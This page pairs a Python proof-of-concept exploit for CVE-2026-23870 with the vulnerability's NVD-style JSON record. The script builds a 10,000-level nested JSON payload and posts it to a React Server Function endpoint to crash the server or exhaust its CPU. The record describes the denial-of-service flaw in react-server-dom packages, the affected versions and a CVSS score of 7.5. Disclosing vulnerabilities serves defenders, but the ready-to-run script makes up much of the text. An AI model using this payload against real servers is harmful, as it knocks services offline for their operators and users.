CVE-2026-23870

import requests import json # Target URL of a React Server Function endpoint target_url = "http://target-app/_server/action" # Craft a deep nested payload to trigger stack overflow or high CPU usage def create_deep_nested_json(depth=10000): result = {} current = result for i in range(depth): current['next'] = {} current = current['next'] return result payload = create_deep_nested_json() try: # Sending the malicious payload response = requests.post(target_url, json=payload) print(f"Status Code: {response.status_code}") except Exception as e: print(f"Request failed or server crashed: {e}")

{"cve": {"id": "CVE-2026-23870", "sourceIdentifier": "[email protected]", "published": "2026-05-06T17:16:22.043", "lastModified": "2026-05-07T14:52:27.380", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial of service vulnerability could be triggered by sending specially crafted HTTP requests to server function endpoints, this could lead to server crashes, out-of-memory exceptions or excessive CPU usage; affecting the following packages: react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack (versions 19.0.0 through 19.0.5, 19.1.0 through 19.1.6, and 19.2.0 through 19.2.5)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "references": [{"url": "https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh", "source": "[email protected]"}]}}